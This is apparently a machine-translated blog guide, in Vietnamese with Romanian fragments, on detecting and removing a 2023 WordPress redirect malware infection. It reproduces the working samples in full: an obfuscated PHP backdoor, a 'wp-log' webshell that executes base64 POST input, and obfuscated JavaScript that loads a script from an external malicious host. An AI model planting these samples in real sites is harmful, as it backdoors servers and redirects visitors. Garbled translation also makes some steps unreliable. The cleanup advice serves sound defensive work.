WordPress chắc chắn là nền tảng được sử dụng nhiều nhất CMS (Content Management System) Đối với cả blog và cửa hàng Starter trực tuyến (với mô-đun WooC Commerce), điều này khiến nó trở thành mục tiêu tấn công máy tính (hack) nhiều nhất. Một trong những hoạt động hack được sử dụng nhiều nhất nhằm mục đích chuyển hướng trang web bị xâm nhập sang các trang web khác. Redirect WordPress Hack 2023 là một phần mềm độc hại tương đối mới có tác dụng chuyển hướng toàn bộ trang web đến các trang web spam hoặc từ đó có thể lây nhiễm vi-rút vào máy tính của người dùng.
nội dung
Nếu trang web của bạn được phát triển trên WordPress được chuyển hướng trên một trang web khác, thì nạn nhân đã là vụ hack chuyển hướng nổi tiếng.
Trong hướng dẫn này, bạn sẽ tìm thấy thông tin cần thiết và các mẹo hữu ích mà qua đó bạn có thể loại bỏ một trang web bị nhiễm chuyển hướng WordPress Hack (Virus Redirect). Thông qua các bình luận, bạn có thể nhận thêm thông tin hoặc yêu cầu giúp đỡ.
Phát hiện virus chuyển hướng các trang web WordPress
Việc giảm lưu lượng truy cập đột ngột và không chính đáng trên trang web, giảm số lượng đơn đặt hàng (trong trường hợp của các cửa hàng trực tuyến) hoặc biên lai quảng cáo là những dấu hiệu đầu tiên cho thấy một cái gì đó không đúng. Phát hiện “Redirect WordPress Hack 2023” (Chuyển hướng virus) có thể được thực hiện và “thị giác” Khi mở trang web và bạn được chuyển hướng đến một trang web khác.
Từ kinh nghiệm, hầu hết các ứng dụng phần mềm độc hại web đều tương thích với các trình duyệt internet: Chrome, Firefox, Edge, Opera. Nếu bạn là người dùng máy tính Mac, các vi -rút này không thể nhìn thấy được trong trình duyệt Safari. Hệ thống bảo mật Safari ngầm chặn các tập lệnh độc hại này.
Bạn cần làm gì nếu có website WordPress Hack Word Hack Virus
Tôi hy vọng biện pháp đầu tiên không phải là hoảng loạn hay xóa trang web. Ngay cả các tệp virus hoặc virus cũng không nên bị xóa trong giai đoạn đầu tiên. Chúng chứa thông tin có giá trị có thể giúp bạn hiểu vi phạm bảo mật ở đâu và virus đã ảnh hưởng gì. Modus operandi.
Đóng trang web cho công chúng.
Làm thế nào để bạn đóng một trang web virus cho khách truy cập? Đơn giản nhất là sử dụng trình quản lý DNS và xóa IP của anh ấy cho “MỘT” (Tên miền) hoặc xác định IP không tồn tại. Do đó, khách truy cập của trang web sẽ được bảo vệ khỏi bản hack WordPress chuyển hướng này có thể đưa họ vào các trang web virus hoặc spam.
Nếu bạn sử dụng CloudFlare Là người quản lý DNS, bạn xác thực trong tài khoản của mình và xóa các bản ghi DNS “A” cho tên miền. Do đó, khu vực bị ảnh hưởng bởi virus sẽ không có IP, không thể truy cập từ Internet.
Sao chép IP của trang web và làm “tuyến đường” để chỉ có thể truy cập bạn. Từ máy tính của bạn.
Làm thế nào để bạn thay đổi IP thực của một trang web trên máy tính Windows?
Phương thức thường được sử dụng để chặn truy cập vào một số trang web nhất định bằng cách chỉnh sửa tệp “Chủ nhà”.
1. Mở Notepad hoặc Trình chỉnh sửa văn bản khác (có quyền quản trị viên) và chỉnh sửa tệp “hosts“. Nó nằm ở:
C:\Windows\System32\drivers\etc\hosts2. Trong tệp “Chủ nhà” thêm vào “tuyến đường” đến IP thực sự của trang web của bạn. IP đã xóa ở trên khỏi trình quản lý DNS.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Lưu tệp và truy cập trang web trong trình duyệt.
Nếu trang web không mở và bạn không mắc lỗi trong tệp “Chủ nhà”, rất có thể là bộ đệm DNS.
Để xóa bộ đệm DNS trên hệ điều hành Windows, hãy mở Command Prompt, nơi bạn thực hiện thứ tự:
ipconfig /flushdnsLàm thế nào để bạn thay đổi IP thực sự của một trang web trên máy tính Mac / Macbook?
Đối với người dùng máy tính Mac, việc thay đổi IP thực của một trang web sẽ dễ dàng hơn một chút.
1. Mở tiện ích Terminal.
2. Thực hiện dòng lệnh (yêu cầu mật khẩu hệ thống để thực thi):
sudo nano /etc/hosts3. Đối với máy tính Windows, thêm IP thực của miền.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Lưu các thay đổi. Ctrl+X (y).
Sau khi bạn đã làm xong “tuyến đường”, Bạn là người duy nhất có thể truy cập trang web Virus Hack Word Word Word.
Trang web dự phòng đầy đủ – Tập tin và cơ sở dữ liệu
Ngay cả khi nó là virus với “chuyển hướng hack wordpress”, khuyến nghị là làm cho một bản sao lưu chung của toàn bộ trang web. Tập tin và cơ sở dữ liệu. Có thể bạn có thể lưu một bản sao cục bộ của cả hai tệp trong public / public_html cũng như cơ sở dữ liệu.
Xác định virus và các tệp được sửa đổi của chuyển hướng WordPress Hack 2023
Các tệp mục tiêu chính của WordPress Tôi là index.php (tại gốc), header.phpThì index.php Và footer.php của chủ đề hoạt động WordPress. Kiểm tra thủ công các tệp này và xác định mã malicid hoặc tập lệnh phần mềm độc hại.
Năm 2023, một loại virus “Chuyển hướng hack wordpress” đặt vào index.php một mã mẫu:
(Tôi không khuyên bạn nên thực thi các mã này!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Decoded, này script malware este practic consecința virusării website-ului WordPress. Nu este scriptul care stă la baza aplicației malware, ci este scriptul care face posibilă redirectionarea paginii web virusate. Dacă decodăm scriptul de mai sus, obținem:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Ca să indetificați toate fișierele de pe server care conțin acest cod, este bine să aveți acces SSH la server pentru a rula linii de comandă de verificare și administrare fișiere pe Linux.
Có liên quan: Làm thế nào để bạn tìm thấy bạn có blog virus hay không, với sự trợ giúp của tìm kiếm Google. (Virus WordPress)
Mai jos sunt două comenzi care cu siguranță sunt de ajutor pentru a indentifica fisierele modificate recent și fisierele care contin un anumit cod (string).
Làm thế nào để bạn thấy các tệp PHP được sửa đổi trong 24 giờ qua hoặc trong một khoảng thời gian khác trên Linux?
Yêu cầu “find” Nó rất đơn giản để sử dụng và cho phép cá nhân hóa đặt khoảng thời gian, bản vá trong đó tìm kiếm và loại tệp được thực hiện.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Trong đầu ra, bạn sẽ nhận được thông tin về ngày và giờ mà tệp được sửa đổi, viết / đọc / thực thi giấy phép (chmod) và có nhóm / người dùng thuộc về.
Nếu bạn muốn kiểm tra vài ngày trước, hãy thay đổi giá trị “-mtime -1” hoặc sử dụng “-mmin -360” Trong vài phút (6 giờ).
Làm thế nào bạn đang tìm kiếm một mã (chuỗi) bên trong các tệp PHP, Java?
Dòng lệnh “tìm thấy” thông qua đó bạn có thể nhanh chóng tìm thấy tất cả các tệp PHP hoặc Java chứa một mã cụ thể như sau:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Đặt hàng sẽ tìm kiếm và hiển thị các tệp .php Và .js chứa “uJjBRODYsU“.
Với sự trợ giúp của hai đơn đặt hàng ở trên, bạn sẽ tìm thấy rất dễ dàng các tệp nào đã được sửa đổi gần đây và chứa mã phần mềm độc hại.
Xóa phần mềm độc hại khỏi các tệp đã sửa đổi mà không ảnh hưởng đến mã chính xác. Trong kịch bản của tôi, mã phần mềm độc hại đã được đặt trước khi mở <head>.
Tại việc thực hiện đơn đặt hàng đầu tiên “tìm thấy” Rất có thể khám phá các tệp mới trên máy chủ, không phải là WordPress hoặc đặt ở đó. Các tập tin đang tuyên bố virus chuyển hướng WordPress Hack.
Trong kịch bản do tôi điều tra, các tệp biểu mẫu xuất hiện trên máy chủ “wp-log-nOXdgD.php“. Đây là những tập tin “thế hệ” cũng chứa mã phần mềm độc hại được sử dụng bởi virus chuyển hướng.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Mục đích của các tệp loại “wp-log-*” Đó là để truyền bá virus hack chuyển hướng và các trang web khác được lưu trữ trên máy chủ. Là mã phần mềm độc hại loại “webshell” bao gồm một Phần cơ bản (trong đó một số biến được mã hóa được xác định) và o Phần thực thi theo đó kẻ tấn công cố gắng tải và thực thi mã phần mềm độc hại trong hệ thống.
Nếu có một biến POST gọi điện ‘bh‘ và giá trị được mã hóa của nó MD5 bằng nhau “8f1f964a4b4d8d1ac3f0386693d28d03“, sau đó tập lệnh dường như viết nội dung được mã hóa base64 của một biến khác gọi là ‘b3‘ trong một tệp tạm thời và sau đó cố gắng bao gồm tệp tạm thời này.
Nếu có một biến POST hoặc GET gọi điện ‘tick'Tập lệnh sẽ phản hồi với giá trị MD5 của chuỗi “885“.
Để xác định tất cả các tệp trên máy chủ chứa mã này, chọn một chuỗi phổ biến, sau đó thực thi lệnh của “find” (tương tự như ở trên). Xóa tất cả các tệp chứa mã phần mềm độc hại này.
Vi phạm bảo mật được vận hành bằng cách chuyển hướng WordPress Hack
Rất có thể virus chuyển hướng này đạt đến Khai thác của người dùng quản trị WordPress hoặc bằng cách xác định một Plugin dễ bị tổn thương cho phép bổ sung người dùng với các đặc quyền quản trị viên.
Đối với hầu hết các trang web được xây dựng trên nền tảng WordPress là có thể Chỉnh sửa các chủ đề của chủ đề hoặc pluginđến giao diện quản trị (Dashboard). Do đó, một người độc hại có thể thêm vào các tệp của phần mềm độc hại chủ đề tạo ra các tập lệnh được trình bày ở trên.
Một ví dụ về phần mềm độc hại như vậy là:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript được xác định trong tiêu đề chủ đề WordPress, ngay sau khi mở nhãn <head>.
Rất khó để giải mã JavaScript này, nhưng rõ ràng là một địa chỉ web khác có khả năng mang lại các tập lệnh khác để tạo tệp “wp-log-*” mà tôi đã nói ở trên.
Tìm kiếm và xóa mã này khỏi tất cả các tệp PHP ảnh hưởng.
Theo như tôi có thể tìm ra mã này là được thêm thủ công bởi một người dùng mới với các đặc quyền quản trị.
Vì vậy, để ngăn chặn việc bổ sung phần mềm độc hại vào bảng điều khiển, tốt nhất là vô hiệu hóa WordPress / plugin trong bảng điều khiển.
Chỉnh sửa tệp wp-config.php và thêm các dòng:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Sau khi bạn thực hiện thay đổi này, không có người dùng WordPress nào có thể chỉnh sửa các tệp bảng điều khiển.
Kiểm tra người dùng với vai trò của quản trị viên
Dưới đây là truy vấn SQL mà bạn có thể sử dụng để tìm kiếm người dùng với quản trị viên trong nền tảng WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Truy vấn này sẽ trả về tất cả người dùng trong bảng wp_users người quy kết vai trò của quản trị viên. Truy vấn được thực hiện cho bảng wp_usermeta Để tìm kiếm trong meta ‘wp_capabilities', Trong đó chứa thông tin về vai trò của người dùng.
Một phương pháp khác là xác định chúng từ: Dashboard → Users → All Users → Administrator. Nhưng tôi đang thực hành một người dùng có thể được ẩn trong bảng điều khiển. Vì vậy, cách tốt nhất để xem người dùng “Quản trị viên” WordPress là lệnh SQL ở trên.
Trong trường hợp của tôi, tôi đã xác định trong cơ sở dữ liệu người dùng có tên “wp-import-user“. Khá gợi ý.
Từ đây, bạn có thể thấy ngày và giờ khi người dùng WordPress được tạo. Người dùng của người dùng cũng rất quan trọng vì anh ta đang tìm kiếm nhật ký máy chủ. Bằng cách này, bạn có thể thấy tất cả các hoạt động của người dùng này.
Xóa người dùng với vai trò của quản trị viên mà bạn không biết, sau đó Thay đổi mật khẩu của bạn cho tất cả người dùng hành chính. Biên tập viên, tác giả, quản trị viên.
Thay đổi mật khẩu của người dùng SQL thành cơ sở dữ liệu của trang web bị ảnh hưởng.
Sau khi thực hiện các bước này, trang web có thể được khởi động lại cho tất cả người dùng.
Tuy nhiên, lưu ý rằng những gì tôi đã trình bày ở trên là một trong hàng ngàn nhổ mà một trang web được chuyển hướng WordPress Hack vào năm 2023.
Nếu trang web của bạn là virus và cần giúp đỡ hoặc nếu bạn có bất kỳ mối quan tâm nào, hộp bình luận sẽ mở.
